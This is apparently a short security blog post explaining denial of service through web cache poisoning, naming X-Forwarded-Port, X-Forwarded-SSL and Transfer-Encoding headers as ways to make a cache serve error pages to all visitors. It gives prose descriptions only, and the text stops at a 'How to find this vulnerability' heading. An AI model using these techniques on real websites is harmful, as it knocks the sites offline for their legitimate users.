Denial Of Service via Cache Poisoning - It’s ToxiC

3 min readMay 10, 2020

Summary :

Denial Of Service :

Denial-of-Service (DoS) is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash. In both instances, the DoS attack deprives legitimate users of the service or resource they expected.

Cache Poisoning :

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.

The cache key only includes the highlighted values, so anyone who subsequently tried to access that URL would get a cache hit and receive the This site can’t be reached response with an error “ERR_UNSAFE_PORT”.

This vulnerability can be exploited in many variations for eg. : using X-Forwarded-Port, X-Forwarded-SSL, Transfer-Encoding etc.

1. X-Forwarded-Port :

X-Forwarded-Port header could be used to persistently poison a redirect with an invalid port, causing a timeout for everyone trying to access the website.

2. X-Forwarded-SSL :

On some websites you can use X-Forwarded-SSL header to overwrite certain pages with a response saying ‘Contradictory scheme headers’.

3. Transfer-Encoding :

You could break core functionality by using an invalid Transfer-Encoding header which will give you the message ‘501 Not Implemented’ and can also overwrite arbitrary pages using Transfer-Encoding.

How to find this vulnerability ?